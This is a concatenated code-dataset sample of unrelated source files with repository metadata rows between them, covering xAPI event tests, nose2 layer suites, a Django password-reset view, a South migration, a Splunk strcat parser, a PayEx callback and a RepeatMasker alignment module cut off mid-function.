'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/comparison/question/3",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/5",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/6",
'type': 'AssessmentItem'
}],
}
self.expected_xapi_course = {
'id': "https://localhost:8888/app/course/"+self.course.uuid,
'definition': {
'type': 'http://adlnet.gov/expapi/activities/course',
'name': {'en-US': self.course.name}
},
'objectType': 'Activity'
}
self.expected_xapi_assignment = {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid,
'definition': {
'type': 'http://adlnet.gov/expapi/activities/assessment',
'name': {'en-US': self.assignment.name},
'description': {'en-US': self.assignment.description},
},
'objectType': 'Activity'
}
def test_on_assignment_create(self):
on_assignment_create.send(
current_app._get_current_object(),
event_name=on_assignment_create.name,
user=self.user,
assignment=self.assignment
)
events = self.get_and_clear_caliper_event_log()
expected_caliper_event = {
'action': 'Created',
'profile': 'ResourceManagementProfile',
'actor': self.get_compair_caliper_actor(self.user),
'membership': self.get_caliper_membership(self.course, self.user, self.lti_context),
'object': self.expected_caliper_assignment,
'session': self.get_caliper_session(self.get_compair_caliper_actor(self.user)),
'type': 'ResourceManagementEvent'
}
self.assertEqual(len(events), 1)
self.assertEqual(events[0], expected_caliper_event)
statements = self.get_and_clear_xapi_statement_log()
expected_xapi_statement = {
"actor": self.get_compair_xapi_actor(self.user),
"verb": {
'id': 'http://activitystrea.ms/schema/1.0/author',
'display': {'en-US': 'authored'}
},
"object": self.expected_xapi_assignment,
"context": {
'contextActivities': {
'parent': [self.expected_xapi_course],
'grouping': []
},
'extensions': {
'http://id.tincanapi.com/extension/browser-info': {},
'http://id.tincanapi.com/extension/session-info': self.get_xapi_session_info(),
'sis_courses': [{
'id': 'sis_course_id',
'section_ids': ['sis_section_id']
}]
}
}
}
self.assertEqual(len(statements), 1)
self.assertEqual(statements[0], expected_xapi_statement)
def test_on_assignment_modified(self):
on_assignment_modified.send(
current_app._get_current_object(),
event_name=on_assignment_modified.name,
user=self.user,
assignment=self.assignment
)
events = self.get_and_clear_caliper_event_log()
expected_caliper_event = {
'action': 'Modified',
'profile': 'ResourceManagementProfile',
'actor': self.get_compair_caliper_actor(self.user),
'membership': self.get_caliper_membership(self.course, self.user, self.lti_context),
'object': self.expected_caliper_assignment,
'session': self.get_caliper_session(self.get_compair_caliper_actor(self.user)),
'type': 'ResourceManagementEvent'
}
self.assertEqual(len(events), 1)
self.assertEqual(events[0], expected_caliper_event)
statements = self.get_and_clear_xapi_statement_log()
expected_xapi_statement = {
"actor": self.get_compair_xapi_actor(self.user),
"verb": {
'id': 'http://activitystrea.ms/schema/1.0/update',
'display': {'en-US': 'updated'}
},
"object": self.expected_xapi_assignment,
"context": {
'contextActivities': {
'parent': [self.expected_xapi_course],
'grouping': []
},
'extensions': {
'http://id.tincanapi.com/extension/browser-info': {},
'http://id.tincanapi.com/extension/session-info': self.get_xapi_session_info(),
'sis_courses': [{
'id': 'sis_course_id',
'section_ids': ['sis_section_id']
}]
}
}
}
self.assertEqual(len(statements), 1)
self.assertEqual(statements[0], expected_xapi_statement)
def test_on_assignment_delete(self):
on_assignment_delete.send(
current_app._get_current_object(),
event_name=on_assignment_delete.name,
user=self.user,
assignment=self.assignment
)
events = self.get_and_clear_caliper_event_log()
expected_caliper_event = {
'action': 'Archived',
'profile': 'ResourceManagementProfile',
'actor': self.get_compair_caliper_actor(self.user),
'membership': self.get_caliper_membership(self.course, self.user, self.lti_context),
'object': self.expected_caliper_assignment,
'session': self.get_caliper_session(self.get_compair_caliper_actor(self.user)),
'type': 'ResourceManagementEvent'
}
self.assertEqual(len(events), 1)
self.assertEqual(events[0], expected_caliper_event)
statements = self.get_and_clear_xapi_statement_log()
expected_xapi_statement = {
"actor": self.get_compair_xapi_actor(self.user),
"verb": {
'id': 'https://w3id.org/xapi/dod-isd/verbs/archived',
'display': {'en-US': 'archived'}
},
"object": self.expected_xapi_assignment,
"context": {
'contextActivities': {
'parent': [self.expected_xapi_course],
'grouping': []
},
'extensions': {
'http://id.tincanapi.com/extension/browser-info': {},
'http://id.tincanapi.com/extension/session-info': self.get_xapi_session_info(),
'sis_courses': [{
'id': 'sis_course_id',
'section_ids': ['sis_section_id']
}]
}
}
}
self.assertEqual(len(statements), 1)
self.assertEqual(statements[0], expected_xapi_statement)
|
gpl-3.0
| 5,911,816,738,190,630,000 | 43.019231 | 137 | 0.54574 | false |
usc-isi-i2/WEDC
|
spark_dependencies/python_lib/nose2/suite.py
|
1
|
3721
|
import sys
import inspect
import logging
from nose2 import util
from nose2.compat import unittest
log = logging.getLogger(__name__)
__unittest = True
#
# Layer suite class
#
class LayerSuite(unittest.BaseTestSuite):
def __init__(self, tests=(), layer=None):
super(LayerSuite, self).__init__(tests)
self.layer = layer
self.wasSetup = False
def run(self, result):
if not self._safeMethodCall(self.setUp, result):
return
try:
for test in self:
if result.shouldStop:
break
self._safeMethodCall(self.setUpTest, result, test)
try:
test(result)
finally:
self._safeMethodCall(self.tearDownTest, result, test)
finally:
if self.wasSetup:
self._safeMethodCall(self.tearDown, result)
def setUp(self):
if self.layer is None:
return
setup = self._getBoundClassmethod(self.layer, 'setUp')
if setup:
setup()
self.wasSetup = True
def setUpTest(self, test):
# FIXME hook call
if self.layer is None:
return
# skip suites, to ensure test setup only runs once around each test
# even for sub-layer suites inside this suite.
try:
iter(test)
except TypeError:
# ok, not a suite
pass
else:
# suite-like enough for skipping
return
if getattr(test, '_layer_wasSetUp', False):
return
self._allLayers(test, 'testSetUp')
test._layer_wasSetUp = True
def tearDownTest(self, test):
# FIXME hook call
if self.layer is None:
return
if not getattr(test, '_layer_wasSetUp', None):
return
self._allLayers(test, 'testTearDown', reverse=True)
delattr(test, '_layer_wasSetUp')
def tearDown(self):
# FIXME hook call
if self.layer is None:
return
teardown = self._getBoundClassmethod(self.layer, 'tearDown')
if teardown:
teardown()
def _safeMethodCall(self, method, result, *args):
try:
method(*args)
return True
except KeyboardInterrupt:
raise
except:
result.addError(self, sys.exc_info())
return False
def _allLayers(self, test, method, reverse=False):
done = set()
all_lys = util.ancestry(self.layer)
if reverse:
all_lys = [reversed(lys) for lys in reversed(all_lys)]
for lys in all_lys:
for layer in lys:
if layer in done:
continue
self._inLayer(layer, test, method)
done.add(layer)
def _inLayer(self, layer, test, method):
meth = self._getBoundClassmethod(layer, method)
if meth:
args, _, _, _ = inspect.getargspec(meth)
if len(args) > 1:
meth(test)
else:
meth()
def _getBoundClassmethod(self, cls, method):
"""
Use instead of :func:`getattr` to get only classmethods explicitly defined
on ``cls`` (not methods inherited from ancestors)
"""
descriptor = cls.__dict__.get(method, None)
if descriptor:
if not isinstance(descriptor, classmethod):
raise TypeError(
'The %s method on a layer must be a classmethod.' % method)
bound_method = descriptor.__get__(None, cls)
return bound_method
else:
return None
|
apache-2.0
| 8,640,215,469,874,628,000 | 27.623077 | 82 | 0.536415 | false |
alphagov/notifications-admin
|
app/main/views/new_password.py
|
1
|
2001
|
import json
from flask import (
current_app,
flash,
redirect,
render_template,
request,
session,
url_for,
)
from itsdangerous import SignatureExpired
from notifications_utils.url_safe_token import check_token
from app.main import main
from app.main.forms import NewPasswordForm
from app.models.user import User
from app.utils.login import log_in_user
@main.route('/new-password/<path:token>', methods=['GET', 'POST'])
def new_password(token):
try:
token_data = check_token(token, current_app.config['SECRET_KEY'], current_app.config['DANGEROUS_SALT'],
current_app.config['EMAIL_EXPIRY_SECONDS'])
except SignatureExpired:
flash('The link in the email we sent you has expired. Enter your email address to resend.')
return redirect(url_for('.forgot_password'))
email_address = json.loads(token_data)['email']
user = User.from_email_address(email_address)
if user.password_changed_more_recently_than(json.loads(token_data)['created_at']):
flash('The link in the email has already been used')
return redirect(url_for('main.index'))
form = NewPasswordForm()
if form.validate_on_submit():
user.reset_failed_login_count()
session['user_details'] = {
'id': user.id,
'email': user.email_address,
'password': form.new_password.data}
if user.email_auth:
# they've just clicked an email link, so have done an email auth journey anyway. Just log them in.
return log_in_user(user.id)
elif user.webauthn_auth:
return redirect(url_for('main.two_factor_webauthn', next=request.args.get('next')))
else:
# send user a 2fa sms code
user.send_verify_code()
return redirect(url_for('main.two_factor_sms', next=request.args.get('next')))
else:
return render_template('views/new-password.html', token=token, form=form, user=user)
|
mit
| -857,660,782,628,308,500 | 36.055556 | 111 | 0.648176 | false |
yochow/autotest
|
client/bin/harness_unittest.py
|
1
|
1129
|
#!/usr/bin/python
import unittest
import common
import harness, harness_standalone, harness_ABAT
from autotest_lib.client.common_lib.test_utils import mock
class harness_unittest(unittest.TestCase):
def setUp(self):
self.god = mock.mock_god()
def tearDown(self):
self.god.unstub_all()
def test_select_none(self):
job = object()
self.god.stub_class(harness_standalone, "harness_standalone")
harness_standalone.harness_standalone.expect_new(job)
harness.select(None, job)
self.god.check_playback()
def test_select_standalone(self):
job = object()
self.god.stub_class(harness_standalone, "harness_standalone")
harness_standalone.harness_standalone.expect_new(job)
harness.select('standalone', job)
self.god.check_playback()
def test_select_ABAT(self):
job = object()
self.god.stub_class(harness_ABAT, "harness_ABAT")
harness_ABAT.harness_ABAT.expect_new(job)
harness.select('ABAT', job)
self.god.check_playback()
if __name__ == "__main__":
unittest.main()
|
gpl-2.0
| -4,472,820,272,422,862,000 | 24.088889 | 69 | 0.649247 | false |
harigov/newsalyzer
|
shared/summarizer.py
|
1
|
1055
|
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lsa import LsaSummarizer as Summarizer
from sumy.nlp.stemmers import Stemmer
from sumy.utils import get_stop_words
# summarizer requires this to work
import nltk
nltk.download('punkt')
class ArticleSummarizer(object):
def __init__(self):
self._language = "english"
self._max_sentence_count = 2
def summarize(self, text):
try:
parser = PlaintextParser.from_string(text, Tokenizer(self._language))
stemmer = Stemmer(self._language)
summarizer = Summarizer(stemmer)
summarizer.stop_words = get_stop_words(self._language)
output = ''
for sentence in summarizer(parser.document, self._max_sentence_count):
output += str(sentence)
return output
except Exception, e:
return ''
if __name__ == "__main__":
text = ""
summarizer = ArticleSummarizer()
print summarizer.summarize(text)
|
mit
| 8,104,878,361,753,222,000 | 32 | 82 | 0.653081 | false |
crflynn/fbm
|
setup.py
|
1
|
1318
|
"""Setup."""
import io
from os import path
from setuptools import setup
here = path.abspath(path.dirname(__file__))
# io.open for py27
with io.open(path.join(here, "README.rst"), encoding="utf-8") as f:
long_description = f.read()
# import __version__ attributes
about = {}
with open(path.join(here, "fbm", "__version__.py")) as f:
exec(f.read(), about)
setup(
name=about["__title__"],
version=about["__version__"],
description=about["__description__"],
long_description=long_description,
url=about["__url__"],
author=about["__author__"],
author_email=about["__author_email__"],
license=about["__license__"],
packages=["fbm"],
zip_safe=False,
install_requires=["numpy"],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
],
include_package_data=True,
)
|
mit
| 2,899,985,746,063,158,300 | 27.652174 | 71 | 0.60698 | false |
assamite/TwatBot
|
tweets/migrations/0008_auto__add_urltweetimage.py
|
1
|
10052
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'URLTweetImage'
db.create_table(u'tweets_urltweetimage', (
(u'tweetimage_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['tweets.TweetImage'], unique=True, primary_key=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
))
db.send_create_signal(u'tweets', ['URLTweetImage'])
def backwards(self, orm):
# Deleting model 'URLTweetImage'
db.delete_table(u'tweets_urltweetimage')
models = {
u'tweets.articletweet': {
'Meta': {'ordering': "['-tweeted']", 'object_name': 'ArticleTweet', '_ormbases': [u'tweets.Tweet']},
'article': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.FlickrTweetImage']"}),
u'tweet_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['tweets.Tweet']", 'unique': 'True', 'primary_key': 'True'})
},
u'tweets.bracketedcolorbigram': {
'Meta': {'ordering': "['-f']", 'unique_together': "(('start_bracket', 'w1', 'w2', 'end_bracket'),)", 'object_name': 'BracketedColorBigram'},
'end_bracket': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_bracket': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.color': {
'Meta': {'unique_together': "(('rgb_r', 'rgb_g', 'rgb_b'),)", 'object_name': 'Color'},
'a': ('django.db.models.fields.FloatField', [], {}),
'b': ('django.db.models.fields.FloatField', [], {}),
'hex': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '8'}),
'html': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '7'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'l': ('django.db.models.fields.FloatField', [], {}),
'rgb_b': ('django.db.models.fields.IntegerField', [], {}),
'rgb_g': ('django.db.models.fields.IntegerField', [], {}),
'rgb_r': ('django.db.models.fields.IntegerField', [], {})
},
u'tweets.colormap': {
'Meta': {'object_name': 'ColorMap'},
'base_color': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}),
'color': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.Color']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stereotype': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.colorunigram': {
'Meta': {'ordering': "['-f']", 'object_name': 'ColorUnigram'},
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'solid_compound': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'tweets.colorunigramsplit': {
'Meta': {'ordering': "['w1', 'w2']", 'unique_together': "(('w1', 'w2'),)", 'object_name': 'ColorUnigramSplit'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.ColorUnigram']"}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.everycolorbottweet': {
'Meta': {'ordering': "['-added', 'color', 'url', 'tweeted']", 'object_name': 'EveryColorBotTweet'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'color': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.Color']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tweet_id': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'tweeted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200'})
},
u'tweets.flickrtweetimage': {
'Meta': {'object_name': 'FlickrTweetImage', '_ormbases': [u'tweets.TweetImage']},
'description': ('django.db.models.fields.TextField', [], {'max_length': '20000'}),
'flickr_farm': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_id': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_secret': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_server': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_user_id': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_user_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
u'tweetimage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['tweets.TweetImage']", 'unique': 'True', 'primary_key': 'True'})
},
u'tweets.pluralcolorbigram': {
'Meta': {'ordering': "['-f']", 'unique_together': "(('w1', 'w2', 'singular'),)", 'object_name': 'PluralColorBigram'},
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'singular': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.retweet': {
'Meta': {'ordering': "['-retweeted']", 'object_name': 'ReTweet'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'retweeted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'screen_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'tweet': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.Tweet']"}),
'tweet_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
u'tweets.tweet': {
'Meta': {'ordering': "['-tweeted']", 'object_name': 'Tweet'},
'color_code': ('django.db.models.fields.CharField', [], {'default': "'0xffffff'", 'max_length': '10'}),
'color_name': ('django.db.models.fields.CharField', [], {'default': "'None'", 'max_length': '100'}),
'context': ('django.db.models.fields.CharField', [], {'default': "'None'", 'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '160'}),
'muse': ('django.db.models.fields.CharField', [], {'default': "'None'", 'max_length': '100'}),
'reasoning': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True'}),
'tweeted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'default': '0.0'})
},
u'tweets.tweetimage': {
'Meta': {'object_name': 'TweetImage'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interjection': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'original': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'processed': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'blank': 'True'})
},
u'tweets.unbracketedcolorbigram': {
'Meta': {'ordering': "['-f']", 'unique_together': "(('w1', 'w2'),)", 'object_name': 'UnbracketedColorBigram'},
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.urltweetimage': {
'Meta': {'object_name': 'URLTweetImage', '_ormbases': [u'tweets.TweetImage']},
u'tweetimage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['tweets.TweetImage']", 'unique': 'True', 'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['tweets']
|
mit
| 7,883,426,377,490,909,000 | 68.8125 | 163 | 0.540788 | false |
salspaugh/splparser
|
splparser/rules/strcatrules.py
|
1
|
1210
|
#!/usr/bin/env python
from splparser.parsetree import *
from splparser.exceptions import SPLSyntaxError
from splparser.rules.common.fieldrules import *
from splparser.rules.common.fieldlistrules import *
from splparser.rules.common.valuerules import *
from splparser.lexers.strcatlexer import precedence, tokens
start = 'cmdexpr'
def p_strcat(p):
"""cmdexpr : STRCAT fieldlist"""
for field_node in p[2].children:
if field_node.nodetype == 'LITERAL':
field_node.role = 'VALUE'
p[0] = ParseTreeNode('COMMAND', raw='strcat')
p[0].add_children(p[2].children)
def p_strcat_opt(p):
"""cmdexpr : STRCAT STRCAT_OPT EQ value fieldlist"""
p[4].value = 'BOOLEAN'
for field_node in p[2].children:
if field_node.nodetype == 'LITERAL':
field_node.role = 'VALUE'
p[0] = ParseTreeNode('COMMAND', raw='strcat')
eq_node = ParseTreeNode('EQ', raw='assign')
opt_node = ParseTreeNode('OPTION', raw=p[2])
opt_node.values.append(p[4])
p[0].add_child(eq_node)
eq_node.add_child(opt_node)
eq_node.add_child(p[4])
p[0].add_children(p[5].children)
def p_error(p):
raise SPLSyntaxError("Syntax error in strcat parser input!")
|
bsd-3-clause
| 7,799,196,665,154,092,000 | 30.842105 | 65 | 0.670248 | false |
funkbit/django-payex
|
djpayex/views.py
|
1
|
1610
|
import logging
from django.conf import settings
from django.http import HttpResponse, HttpResponseNotAllowed
from payex.service import PayEx
from djpayex.models import TransactionStatus
logger = logging.getLogger(__name__)
# Initialize PayEx service
service = PayEx(
merchant_number=settings.PAYEX_MERCHANT_NUMBER,
encryption_key=settings.PAYEX_ENCRYPTION_KEY,
production=settings.PAYEX_IN_PRODUCTION
)
def callback(request):
"""
NOTE Not fully implemented yet.
PayEx will send a transaction callback (as HTTP Post) to the merchant,
if any transaction status is updated at the PayEx system.
Request from PayEx:
HTTP 200 transactionRef =<32 digits>&transactionNumber=<8 digits>(&orderRef=<32 digits> if exists)
Response from merchant:
HTTP 200 OK or FAILURE. On "FAILURE" PayEx will retry the HTTP POST-request 5 times, with approximately 15 minutes interval
Documentation:
http://www.payexpim.com/quick-guide/9-transaction-callback/
"""
logger.info('Got PayEx callback: %(raw_post_data)s\n%(meta)s\n%(post_data)s' % {
'raw_post_data': request.raw_post_data,
'meta': request.META,
'post_data': request.POST,
})
if request.method != 'POST':
return HttpResponseNotAllowed(['POST',])
orderref = request.POST.get('orderRef', None)
if orderref:
response = service.complete(orderRef=orderref)
status = TransactionStatus.objects.create_from_response(response)
return HttpResponse('OK')
return HttpResponse('FAILURE')
|
bsd-2-clause
| -4,014,406,681,933,296,000 | 30.568627 | 131 | 0.68882 | false |
pjuren/pyokit
|
src/pyokit/io/repeatmaskerAlignments.py
|
1
|
38860
|
"""
Date of Creation: 11th Dec 2014
Description: Classes and functions for IO of repeatmasker pairwise
alignments.
Copyright (C) 2010-2015
Philip J. Uren,
Authors: Philip J. Uren
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# standard python imports
import sys
import StringIO
import unittest
import re
# Pyokit imports
from pyokit.datastruct.sequence import Sequence
from pyokit.datastruct.sequence import UNKNOWN_SEQ_NAME
from pyokit.util.progressIndicator import ProgressIndicator
from pyokit.datastruct.multipleAlignment import PairwiseAlignment
from pyokit.datastruct.multipleAlignment import JustInTimePairwiseAlignment
###############################################################################
# CONSTANTS #
###############################################################################
REPEATMASKER_FIELDS_TO_TRIM = [0, 1, 4, 7, 8, 9, 11]
REPEATMASKER_VALIDATE_MUTATIONS = True
REPEATMASKER_VALID_ANN_CHARS = ['-', 'i', 'v', ' ', '?']
# dafults values for reepatmasker formatting variables
DEFAULT_MAX_NAME_WIDTH = None
DEFAULT_COL_WIDTH = 50
###############################################################################
# META-DATA ALIGNMENT CONSTANTS #
# these are the keys to index into a pairwise alignment object's meta-data #
# dictionary and extract whatever is needed for formatting a repeat-masker #
# representation of it #
###############################################################################
# stores the value of the second-last token from the header of the alignment;
# its meaning is unknown to me.
UNKNOWN_RM_HEADER_FIELD_KEY = "unknown_rm_header_field"
# stores the unique ID assigned to an alignment but repeat-masker
RM_ID_KEY = "rm_id"
#: score for the alignment; no requirement on how this is computed.
ALIG_SCORE_KEY = "alig_score"
#: annotation for each column of the alignment; no requirements on format.
ANNOTATION_KEY = "annotation"
#: percentage of substitutions (i.e. columns that have no gaps, not matches)
PCENT_SUBS_KEY = "pcnt_subs"
#: the percentage of the first sequence which is gaps. This is not computed
#: from the sequence itself, so may not be accurate.
PCENT_S1_INDELS_KEY = "pcnt_s1_indels"
#: the percentage of the second sequence which is gaps. This is not computed
#: from the sequence itself, so may not be accurate.
PCENT_S2_INDELS_KEY = "pcnt_s2_indels"
#:
ROUNDTRIP_KEY = "roundtrip"
###############################################################################
# FULL KEY LIST #
###############################################################################
#: The full set of meta-data keys that have special meaning
KNOWN_KEYS = set([ANNOTATION_KEY, PCENT_SUBS_KEY, PCENT_S1_INDELS_KEY,
PCENT_S2_INDELS_KEY, ALIG_SCORE_KEY, RM_ID_KEY,
UNKNOWN_RM_HEADER_FIELD_KEY])
###############################################################################
# CONVERTING ALIGNMENTS TO REPEATMASKER STRING FORMATS #
###############################################################################
def _get_repeat_masker_header(pairwise_alignment):
"""generate header string of repeatmasker formated repr of self."""
res = ""
res += str(pairwise_alignment.meta[ALIG_SCORE_KEY]) + " "
res += "{:.2f}".format(pairwise_alignment.meta[PCENT_SUBS_KEY]) + " "
res += "{:.2f}".format(pairwise_alignment.meta[PCENT_S1_INDELS_KEY]) + " "
res += "{:.2f}".format(pairwise_alignment.meta[PCENT_S2_INDELS_KEY]) + " "
res += (pairwise_alignment.s1.name
if (pairwise_alignment.s1.name != "" and
pairwise_alignment.s1.name is not None)
else UNKNOWN_SEQ_NAME) + " "
res += str(pairwise_alignment.s1.start) + " "
res += str(pairwise_alignment.s1.end - 1) + " "
res += "(" + str(pairwise_alignment.s1.remaining) + ") "
res += ("C " if not pairwise_alignment.s2.is_positive_strand() else "")
res += (pairwise_alignment.s2.name
if (pairwise_alignment.s2.name != "" and
pairwise_alignment.s2.name is not None)
else UNKNOWN_SEQ_NAME) + " "
res += ("(" + str(pairwise_alignment.s2.remaining) + ")"
if not pairwise_alignment.s2.is_positive_strand()
else str(pairwise_alignment.s2.start))
res += " "
# Note here that we need to convert between our internal representation
# for coordinates and the repeat-masker one; internally, we always store
# coordinates as exclusive of the final value with start < end;
# repeatmasker gives the larger coordinate as the 'start' when the match
# is to the reverse complement, so we have to swap start/end, and its
# coordinates are inclusive of end, so we have to subtract 1 from end.
res += str(pairwise_alignment.s2.end - 1) + " "
res += (str(pairwise_alignment.s2.start)
if not pairwise_alignment.s2.is_positive_strand()
else "(" + str(pairwise_alignment.s2.remaining) + ")") + " "
res += pairwise_alignment.meta[UNKNOWN_RM_HEADER_FIELD_KEY] + " "
res += str(pairwise_alignment.meta[RM_ID_KEY])
return res
def _to_repeatmasker_string(pairwise_alignment, column_width=DEFAULT_COL_WIDTH,
m_name_width=DEFAULT_MAX_NAME_WIDTH):
"""
generate a repeatmasker formated representation of this pairwise alignment.
:param column_width: number of characters to output per line of alignment
:param m_name_width: truncate names on alignment lines to this length
(set to None for no truncation)
"""
s1 = pairwise_alignment.s1
s2 = pairwise_alignment.s2
s1_neg = not s1.is_positive_strand()
s2_neg = not s2.is_positive_strand()
size = pairwise_alignment.size()
# figure out the complement column
s1_comp = "C" if s1_neg else " "
s2_comp = "C" if s2_neg else " "
# figure out the maximum name length, so we can size that column properly;
# pre-compute the space-padded names too
s1_len = len(s1.name)
s2_len = len(s2.name)
f_len = max(s1_len, s2_len)
if m_name_width is not None:
f_len = min(f_len, m_name_width)
s1_n = s1.name[:f_len] + (' ' * (f_len - s1_len))
s2_n = s2.name[:f_len] + (' ' * (f_len - s2_len))
# figure out the max width for the coordinates column; we use size of the
# alignment here rather than ungapped coordinates because its an upper
# bound and easier to compute (i.e. for sure already know).
s1_line_end_num = (s1.end if s1_neg else s1.start - 1)
s2_line_end_num = (s2.end if s2_neg else s2.start - 1)
max_num_len = max(len(str(s1.start + size)), len(str(s2.start + size)))
res = "" # our result
i = 0 # how much of the full, gapped alignment, has been output so far?
res += _get_repeat_masker_header(pairwise_alignment) + "\n\n"
while i < len(pairwise_alignment.s1):
# keep track of how much of each sequence we've output
s1_sub = s1.gapped_relative_subsequence(i + 1, min(i + column_width + 1, len(s1) + 1))
s2_sub = s2.gapped_relative_subsequence(i + 1, min(i + column_width + 1, len(s2) + 1))
s1_ug_len = s1_sub.ungapped_len
s2_ug_len = s2_sub.ungapped_len
s1_line_start_num = (s1_line_end_num - 1 if s1_neg
else s1_line_end_num + 1)
s1_line_end_num = (s1_line_start_num - s1_ug_len + 1 if s1_neg
else s1_line_start_num + s1_ug_len - 1)
s2_line_start_num = (s2_line_end_num - 1 if s2_neg
else s2_line_end_num + 1)
s2_line_end_num = (s2_line_start_num - s2_ug_len + 1 if s2_neg
else s2_line_start_num + s2_ug_len - 1)
# output sequence one
res += (s1_comp + " " + s1_n + " ")
s1_line_start_num_str = str(s1_line_start_num)
s1_num_padding = max_num_len - len(s1_line_start_num_str)
res += (' ' * s1_num_padding) + s1_line_start_num_str + " "
res += pairwise_alignment.s1[i:i + column_width] + " "
res += str(s1_line_end_num) + "\n"
# output the annotation string, if we have one; needs to be padded by the
# number of char in the name col (f_len), the number in the coordinate
# col (max_num_len), the one char in the complement columns, and the
